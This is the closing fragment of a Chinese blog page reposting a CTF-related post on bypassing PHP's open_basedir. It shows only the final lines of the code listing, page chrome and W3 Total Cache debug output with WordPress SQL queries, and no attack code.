style="margin:0px;padding:0px;border:none;color:#000000;background-color:inherit;">?>&nbsp;&nbsp;</span></li> <li class="alt" style="border-top:none;border-right:none;border-bottom:none;border-left:3px solid rgb(108,226,108);color:inherit;line-height:18px;padding:0px 3px 0px 10px;margin-right:0px;margin-bottom:0px;list-style-position:outside;"><span style="margin:0px;padding:0px;border:none;color:#000000;background-color:inherit;"></ol> <p>&nbsp;&nbsp;</span></li> <li style="border-top:none;border-right:none;border-bottom:none;border-left:3px solid rgb(108,226,108);background-color:rgb(248,248,248);line-height:18px;padding:0px 3px 0px 10px;margin-right:0px;margin-bottom:0px;list-style-position:outside;"><span style="margin:0px;padding:0px;border:none;color:#000000;background-color:inherit;"><?php&nbsp;<span class="keyword" style="margin:0px;padding:0px;border:none;color:rgb(0,102,153);background-color:inherit;font-weight:bold;">endif</span><span style="margin:0px;padding:0px;border:none;background-color:inherit;">;?>&nbsp;&nbsp;</span></span></li> </ol> </div> </div> </div> <div class="article-bar-bottom" style="padding:0px 0px 16px;margin:36px 0px 0px;border-bottom:1px solid rgb(227,227,227);color:rgb(51,51,51);font-family:'SF Pro Display', Roboto, Noto, Arial, 'PingFang SC', 'Hiragino Sans GB', 'Microsoft YaHei', sans-serif;font-size:14px;"> <div class="article-copyright" style="padding:0px;margin:0px;font-size:12px;color:rgb(153,153,153);">版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/niexinming/article/details/53146095</div> </div></div> <link rel="stylesheet" href="https://csdnimg.cn/release/phoenix/production/wapedit_views-8e29c324bc.css"> </div> <div class="entry-details" itemprop="copyrightHolder" itemtype="https://schema.org/Organization" itemscope> <details> <summary>原文链接:<a href="https://ysuo.org/2018/05/03/%e7%bb%95%e8%bf%87open_basedir%e8%af%bb%e6%96%87%e4%bb%b6%e8%84%9a%e6%9c%ac/" rel="author">绕过open_basedir读文件脚本</a>,转发请注明来源!</summary> </details> </div> </div> <div class="entry-footer clearfix" role="toolbar"><div class="bd-share"><div class="bdsharebuttonbox"><a class="bds_qzone" data-cmd="qzone"></a><a class="bds_tsina" data-cmd="tsina"></a><a class="bds_weixin" data-cmd="weixin"></a><a class="bds_more" data-cmd="more"></a></div><script>var share_excerpt = '【绕过open_basedir读文件脚本】 绕过open_basedir读文件脚本2016年11月13日 01:28:21阅读数:1221参加了一场2016年的sycsec感觉又学到不少东西废话不多说,首先啥是open_basedir?op...';var share_pic = '';var share_url = 'https://ysuo.org/2018/05/03/%e7%bb%95%e8%bf%87open_basedir%e8%af%bb%e6%96%87%e4%bb%b6%e8%84%9a%e6%9c%ac/?fid=0';var wkey = '';var qkey = '';window._bd_share_main = false;window._bd_share_config = { common : { bdText : share_excerpt,bdDesc : share_excerpt,bdUrl : share_url, bdPic : share_pic, bdSnsKey : {'tsina':wkey, 'tqq':qkey,'qzone':qkey} }, share : [{ 'bdStyle' : 1, 'bdSize' : 24 }] };</script></div><div class="btn-group vote-group" data-votes-up="0" data-votes-down="0" data-vote-id="1321" data-vote-type="post" itemscope itemtype="http://data-vocabulary.org/Review-aggregate"> <a href="javascript:;" class="btn btn-default up"><span class="glyphicon glyphicon-thumbs-up"></span> <span class="votes">0</span><div class="hide" itemprop="rating" itemscope itemtype="http://data-vocabulary.org/Rating"><span itemprop="average">1</span><span itemprop="votes">0</span><span itemprop="count">0</span></div></a> <a href="javascript:;" class="btn btn-default down"><span class="glyphicon glyphicon-thumbs-down"></span></a> </div><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://ysuo.org/" title="伊索笔记" itemprop="url"><span itemprop="title">伊索笔记</span></a></span> › <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://ysuo.org/category/internet/" title="互联网" itemprop="url"><span itemprop="title">互联网</span></a></span> › <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="https://ysuo.org/2018/05/03/%e7%bb%95%e8%bf%87open_basedir%e8%af%bb%e6%96%87%e4%bb%b6%e8%84%9a%e6%9c%ac/" title="绕过open_basedir读文件脚本" itemprop="url"><span itemprop="title">绕过open_basedir读文件脚本</span></a></span></div> <div class="panel-footer profile clearfix" itemprop="publisher" itemscope itemtype="http://schema.org/Organization"> <a class="author-avatar" href="https://ysuo.org/author/admin/"> <img src="https://ysuo.org/blog/wp-content/themes/dmeng2.0/images/grey.png" data-original="https://secure.gravatar.com/avatar/7e935e3b5cf86ad86d8d2500c4c25bc6?d=mystery&r=G&s=50" class="avatar" width="50" height="50" /> </a> <div class="author-description"> <div class="author-name"> 作者 : <span itemprop="name">admin</span> </div> <div itemprop="description">没有个人说明</div> </div> </div> </div> <nav class="pager" role="navigation" itemscope itemtype="https://schema.org/SiteNavigationElement"> <li class="previous"><a href="https://ysuo.org/2018/05/01/ec2%e5%bc%80%e5%90%afipv6%e8%ae%bf%e9%97%ae%e5%92%8c%e7%a6%81%e6%ad%a2%e9%87%8d%e5%90%af%e5%90%8e%e8%87%aa%e5%8a%a8%e5%88%86%e9%85%8dip%e5%9c%b0%e5%9d%80/" rel="prev"><span class="text-muted">上一篇:</span> <span itemprop="name">EC2 开启 IPV6 访问 和 禁止重启后自动分配IP地址</span></a></li><li class="next"><a href="https://ysuo.org/2018/05/07/%e4%bd%bf%e7%94%a8libreswan%e5%92%8cubiquitiedgerouter%e4%b8%bagooglecloud%e8%ae%be%e7%bd%aeipsecvpn/" rel="next"><span class="text-muted">下一篇:</span> <span itemprop="name">使用Libreswan和Ubiquiti EdgeRouter为Google Cloud设置IPsec VPN</span></a></li> </nav><!-- .navigation --> <div class="panel panel-default" id="comments" data-no-instant> <div class="panel-body">评论已关闭。</div> </div> </article><!-- #content --> <div id="sidebar" class="col-lg-4 col-md-4" role="complementary" itemscope itemtype="http://schema.org/WPSideBar"> </div><!-- #sidebar --> </div> </div><!-- #main --> <footer id="colophon" class="container" role="contentinfo" itemscope itemtype="http://schema.org/WPFooter"> <div class="panel panel-default text-muted"> <div class="panel-body"> </div> <div class="panel-footer clearfix"> &copy; 2018 <a href="https://ysuo.org/">伊索笔记</a> 版权所有 <span class="pull-right copyright"><a href="http://www.dmeng.net/wordpress/" target="_blank">WordPress主题</a> 源自 <a href="http://www.dmeng.net/" rel="generator" target="_blank">多梦网络</a></span> </div> </div> </footer> <script>var ajaxurl = 'https:\/\/ysuo.org\/blog\/wp-admin\/admin-ajax.php';var isUserLoggedIn = 0;var loginUrl = 'https:\/\/ysuo.org\/blog\/wp-login.php?redirect_to=https%3A%2F%2Fysuo.org%2F2018%2F05%2F03%2F%25E7%25BB%2595%25E8%25BF%2587open_basedir%25E8%25AF%25BB%25E6%2596%2587%25E4%25BB%25B6%25E8%2584%259A%25E6%259C%25AC%2F';var dmengPath = 'https:\/\/ysuo.org\/blog\/wp-content\/themes\/dmeng2.0/';var dmengTracker = {"type":"single","pid":1321};var dmengInstant = 0;var dmengTips = {"success":"\u64cd\u4f5c\u6210\u529f","error":"\u64cd\u4f5c\u5931\u8d25","tryagain":"\u8bf7\u91cd\u8bd5"};var dmengCodePrettify = 0;</script><script src="http://bdimg.share.baidu.com/static/api/js/share.js?cdnversion=427810"></script><script type="text/javascript" src="https://ysuo.org/blog/wp-content/cache/minify/faa76.js"></script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 25/50 objects using disk Object Cache debug info: Caching: enabled Total calls: 50 Cache hits: 25 Cache misses: 25 Total time: 0.0237 W3TC Object Cache info: # | Op | Returned | Data size (b) | Query time (s) | Group | ID 1 | get | from persistent cache | 4 | 0.0003 | default | is_blog_installed 2 | get | from persistent cache | 779 | 0.0003 | options | notoptions 3 | get | from persistent cache | 53763 | 0.0003 | options | alloptions 4 | get | not in cache | | 0.0001 | site-options | 1:notoptions 5 | get | not in cache | | 0.0001 | category_relationships | 1321 6 | get | not in cache | | 0.0001 | post_tag_relationships | 1321 7 | get | not in cache | | 0.0001 | post_format_relationships | 1321 8 | get | from persistent cache | 289768 | 0.0008 | posts | 1321 9 | get | not in cache | | 0.0001 | post_meta | 1321 10 | get | not in cache | | 0.0001 | post_meta | 1321 11 | get | not in cache | | 0.0001 | post_meta | 1321 12 | set | put in cache | | 0 | post_meta | 1321 13 | get | not in cache | | 0.0001 | category_relationships | 1321 14 | get | from persistent cache | 29 | 0.0003 | terms | last_changed 15 | get | not in cache | | 0.0001 | terms | get_terms:0639119b580a6363b6970fa208e1eab0:0.53598300 1540117262 16 | get | from persistent cache | 253 | 0.0002 | terms | 15 17 | get | from persistent cache | | 0.0003 | term_meta | 15 18 | get | not in cache | | 0.0001 | terms | get_terms:0639119b580a6363b6970fa208e1eab0:0.53598300 1540117262 19 | set | put in cache | 263 | 0 | terms | get_terms:0639119b580a6363b6970fa208e1eab0:0.53598300 1540117262 20 | get | not in cache | | 0.0001 | category_relationships | 1321 21 | set | put in cache | 15 | 0 | category_relationships | 1321 22 | get | not in cache | | 0.0001 | site-options | 1:notoptions 23 | get | from persistent cache | 8 | 0.0003 | options | can_compress_scripts 24 | get | not in cache | | 0.0001 | site-options | 1:notoptions 25 | get | not in cache | | 0 | counts | adjacent_post_3c4312c882369c4526c49b1e06d68958 26 | set | discarded | 11 | 0 | counts | adjacent_post_3c4312c882369c4526c49b1e06d68958 27 | get | from persistent cache | 2005 | 0.0003 | posts | 1322 28 | get | not in cache | | 0 | counts | adjacent_post_b108a8bf9d4f43dc56e1bbee32c3e274 29 | set | discarded | 11 | 0 | counts | adjacent_post_b108a8bf9d4f43dc56e1bbee32c3e274 30 | get | from persistent cache | 48325 | 0.0004 | posts | 1320 31 | get | not in cache | | 0.0001 | post_tag_relationships | 1321 32 | get | not in cache | | 0.0001 | terms | get_terms:8510c2b11b4cb6a2bc6bbab478377d4e:0.53598300 1540117262 33 | get | not in cache | | 0.0001 | terms | get_terms:8510c2b11b4cb6a2bc6bbab478377d4e:0.53598300 1540117262 34 | set | put in cache | | 0 | terms | get_terms:8510c2b11b4cb6a2bc6bbab478377d4e:0.53598300 1540117262 35 | set | put in cache | | 0 | post_tag_relationships | 1321 36 | get | from persistent cache | 837 | 0.0003 | posts | 1619 37 | get | from persistent cache | 971 | 0.0002 | post_meta | 1619 38 | get | not in cache | | 0.0001 | post_format_relationships | 1321 39 | get | not in cache | | 0.0001 | terms | get_terms:9c9f894cc1f52dc3afb3b395494b35b9:0.53598300 1540117262 40 | get | not in cache | | 0.0001 | terms | get_terms:9c9f894cc1f52dc3afb3b395494b35b9:0.53598300 1540117262 41 | set | put in cache | | 0 | terms | get_terms:9c9f894cc1f52dc3afb3b395494b35b9:0.53598300 1540117262 42 | get | not in cache | | 0.0001 | post_format_relationships | 1321 43 | set | put in cache | | 0 | post_format_relationships | 1321 44 | get | not in cache | | 0.0001 | options | _transient_timeout_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175 45 | set | put in cache | 850 | 0 | options | notoptions 46 | get | not in cache | | 0.0001 | options | _transient_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175 47 | set | put in cache | 913 | 0 | options | notoptions 48 | get | not in db | | 0.0029 | transient | dmeng_n_0f4295d3b0b61c8b6d491ffe29265175 49 | get | from persistent cache | | 0.0002 | terms | get_terms:deb82856bf14ab1b000f58d553877697:0.53598300 1540117262 50 | get | from persistent cache | | 0.0002 | terms | get_terms:0e6d6b5b2ec3d4deb6b34df7484fad35:0.53598300 1540117262 51 | get | from persistent cache | 286 | 0.0002 | terms | 2 52 | get | from persistent cache | 58 | 0.0001 | terms | get_objects_in_term:cd92c529950b36e8ff46f3011624a054:0.53598300 1540117262 53 | get | from persistent cache | 399 | 0.0002 | post_meta | 37 54 | get | from persistent cache | 382 | 0.0002 | post_meta | 38 55 | get | from persistent cache | 927 | 0.0002 | posts | 27 56 | get | from persistent cache | 382 | 0.0002 | post_meta | 39 57 | get | from persistent cache | 784 | 0.0002 | posts | 29 58 | get | from persistent cache | 382 | 0.0002 | post_meta | 40 59 | get | from persistent cache | 918 | 0.0002 | posts | 28 60 | get | not in cache | | 0.0001 | terms | get_terms:53b4dd7fd3a3286f1b1f5159f20c1542:0.53598300 1540117262 61 | get | not in cache | | 0.0001 | terms | get_terms:53b4dd7fd3a3286f1b1f5159f20c1542:0.53598300 1540117262 62 | set | put in cache | 15 | 0 | terms | get_terms:53b4dd7fd3a3286f1b1f5159f20c1542:0.53598300 1540117262 63 | set | put in cache | 13 | 0 | options | _transient_timeout_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175 64 | set | put in cache | 842 | 0 | options | notoptions 65 | set | put in cache | 381 | 0 | options | _transient_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175 66 | set | put in cache | 779 | 0 | options | notoptions 67 | set | put in cache | 381 | 0 | transient | dmeng_n_0f4295d3b0b61c8b6d491ffe29265175 68 | get | from persistent cache | 371 | 0.0003 | users | 1 69 | get | from persistent cache | 3314 | 0.0002 | user_meta | 1 70 | get | not in cache | | 0 | counts | adjacent_post_42029df52faa76a1b5a3efd047b71a36 71 | set | discarded | 11 | 0 | counts | adjacent_post_42029df52faa76a1b5a3efd047b71a36 72 | get | not in cache | | 0 | counts | adjacent_post_6f2ab16660e6c95fb3d206fd27bd1b7d 73 | set | discarded | 11 | 0 | counts | adjacent_post_6f2ab16660e6c95fb3d206fd27bd1b7d 74 | get | not in cache | | 0 | comment | last_changed 75 | set | discarded | 29 | 0 | comment | last_changed 76 | get | not in cache | | 0 | comment | get_comments:24fb1ae1574da9ed5c13bbbfc85c1772:0.80672200 1540118367 77 | get | not in cache | | 0 | comment | get_comments:24fb1ae1574da9ed5c13bbbfc85c1772:0.80672200 1540118367 78 | set | discarded | 57 | 0 | comment | get_comments:24fb1ae1574da9ed5c13bbbfc85c1772:0.80672200 1540118367 Page Caching using disk: enhanced Page cache debug info: Engine: disk: enhanced Cache key: ysuo.org/2018/05/03/绕过open_basedir读文件脚本/_index_ssl.html Creation Time: 1540118367.000s Header info: X-Powered-By: PHP/7.2.7 Content-Type: text/html; charset=UTF-8 Link: <https://ysuo.org/wp-json/>; rel="https://api.w.org/" Link: <https://ysuo.org/?p=1321>; rel=shortlink Minified using disk Minify debug info: Theme: 8afd4 Template: single Database Caching 1/23 queries in 0.031 seconds using disk (Request-wide modification query) Db cache debug info: Total queries: 23 Cached queries: 1 Total query time: 0.0310 SQL info: # | Time (s) | Caching (Reject reason) | Status | Data size (b) | Group | Query 1 | 0.003 | enabled | not cached | 297946 | singletables | SELECT wp_posts.* FROM wp_posts WHERE 1=1 AND ( ( YEAR( wp_posts.post_date ) = 2018 AND MONTH( wp_posts.post_date ) = 5 AND DAYOFMONTH( wp_posts.post_date ) = 3 ) ) AND wp_posts.post_name = '%e7%bb%95%e8%bf%87open_basedir%e8%af%bb%e6%96%87%e4%bb%b6%e8%84%9a%e6%9c%ac' AND wp_posts.post_type = 'post' ORDER BY wp_posts.post_date DESC 2 | 0.0024 | enabled | not cached | 3838 | singletables | SELECT * FROM wp_statistics_useronline WHERE `ip` = '54.166.130.157' AND `agent` = 'CCBot' AND `platform` = '未知' AND `version` = '2.0' 3 | 0.0002 | enabled | cached | 3838 | singletables | SELECT * FROM wp_statistics_useronline WHERE `ip` = '54.166.130.157' AND `agent` = 'CCBot' AND `platform` = '未知' AND `version` = '2.0' 4 | 0.0003 | disabled (modification query) | not cached | 0 | singletables | DELETE FROM wp_statistics_useronline WHERE timestamp < '1540147137' 5 | 0.0007 | disabled (modification query) | not cached | 0 | | SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN (1321) ORDER BY meta_id ASC 6 | 0.0013 | disabled (modification query) | not cached | 0 | | SELECT t.*, tt.* FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships AS tr ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy IN ('category') AND tr.object_id IN (1321) ORDER BY t.name ASC 7 | 0.001 | disabled (modification query) | not cached | 0 | | SELECT p.ID FROM wp_posts AS p WHERE p.post_date < '2018-05-03 01:14:00' AND p.post_type = 'post' AND p.post_status = 'publish' ORDER BY p.post_date DESC LIMIT 1 8 | 0.0006 | disabled (modification query) | not cached | 0 | | SELECT p.ID FROM wp_posts AS p WHERE p.post_date > '2018-05-03 01:14:00' AND p.post_type = 'post' AND p.post_status = 'publish' ORDER BY p.post_date ASC LIMIT 1 9 | 0.0015 | disabled (modification query) | not cached | 0 | | SELECT t.*, tt.* FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships AS tr ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy IN ('post_tag') AND tr.object_id IN (1321) ORDER BY t.name ASC 10 | 0.0005 | disabled (modification query) | not cached | 0 | | SELECT value FROM wp_statistics_historical WHERE category = 'uri' AND page_id = 1321 11 | 0.0008 | disabled (modification query) | not cached | 0 | | SELECT SUM(count) FROM wp_statistics_pages WHERE `id` = 1321 12 | 0.002 | disabled (modification query) | not cached | 0 | | SELECT t.*, tt.* FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships AS tr ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy IN ('post_format') AND tr.object_id IN (1321) ORDER BY t.name ASC 13 | 0.0006 | disabled (modification query) | not cached | 0 | | SELECT option_value FROM wp_options WHERE option_name = '_transient_timeout_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175' LIMIT 1 14 | 0.0005 | disabled (modification query) | not cached | 0 | | SELECT option_value FROM wp_options WHERE option_name = '_transient_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175' LIMIT 1 15 | 0.001 | disabled (modification query) | not cached | 0 | | SELECT wp_posts.* FROM wp_posts WHERE 1=1 AND wp_posts.ID IN (37,38,39,40) AND wp_posts.post_type = 'nav_menu_item' AND ((wp_posts.post_status = 'publish')) ORDER BY wp_posts.menu_order ASC 16 | 0.0015 | disabled (modification query) | not cached | 0 | | SELECT t.term_id, tt.parent, tt.count, tt.taxonomy FROM wp_terms AS t INNER JOIN wp_term_taxonomy AS tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships AS tr ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy IN ('category') AND tr.object_id IN (1321) ORDER BY t.name ASC 17 | 0.003 | disabled (modification query) | not cached | 0 | options | INSERT INTO `wp_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175', '1540121967', 'no') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) 18 | 0.004 | disabled (modification query) | not cached | 0 | options | INSERT INTO `wp_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_dmeng_n_0f4295d3b0b61c8b6d491ffe29265175', '<ul class=\"nav navbar-nav\"><li><a href=\"https://ysuo.org/\" itemprop=\"url\">首页</a></li><li><a href=\"https://ysuo.org/{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}e5{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}85{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}b3{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}e4{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}ba{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}8e/\" itemprop=\"url\">关于</a></li><li><a href=\"https://ysuo.org/{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}e5{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}8d{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}9a{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}e5{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}ae{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}a2/\" itemprop=\"url\">博客</a></li><li><a href=\"https://ysuo.org/{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}e8{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}81{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}94{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}e7{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}b3{862a76b0571872339c877deb56304958866640fdaef81db85e9462ae4aed4b92}bb/\" itemprop=\"url\">联系</a></li></ul><!- - cached 2018-10-21 18:39:27 - ->', 'no') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) 19 | 0.0014 | disabled (modification query) | not cached | 0 | | SELECT traffic FROM wp_dmeng_tracker WHERE type='single' AND pid='1321' 20 | 0.0008 | disabled (modification query) | not cached | 0 | | SELECT SUM(count) FROM wp_statistics_pages WHERE `id` = 1321 21 | 0.0027 | disabled (modification query) | not cached | 0 | | SELECT p.ID FROM wp_posts AS p INNER JOIN wp_term_relationships AS tr ON p.ID = tr.object_id INNER JOIN wp_term_taxonomy tt ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE p.post_date < '2018-05-03 01:14:00' AND p.post_type = 'post' AND tt.taxonomy = 'category' AND tt.term_id IN (15) AND p.post_status = 'publish' ORDER BY p.post_date DESC LIMIT 1 22 | 0.0007 | disabled (modification query) | not cached | 0 | | SELECT p.ID FROM wp_posts AS p INNER JOIN wp_term_relationships AS tr ON p.ID = tr.object_id INNER JOIN wp_term_taxonomy tt ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE p.post_date > '2018-05-03 01:14:00' AND p.post_type = 'post' AND tt.taxonomy = 'category' AND tt.term_id IN (15) AND p.post_status = 'publish' ORDER BY p.post_date ASC LIMIT 1 23 | 0.0005 | disabled (modification query) | not cached | 0 | | SELECT SQL_CALC_FOUND_ROWS wp_comments.comment_ID FROM wp_comments WHERE ( comment_approved = '1' ) AND comment_post_ID = 1321 AND comment_parent = 0 ORDER BY wp_comments.comment_date_gmt ASC, wp_comments.comment_ID ASC Served from: ysuo.org @ 2018-10-21 18:39:27 by W3 Total Cache -->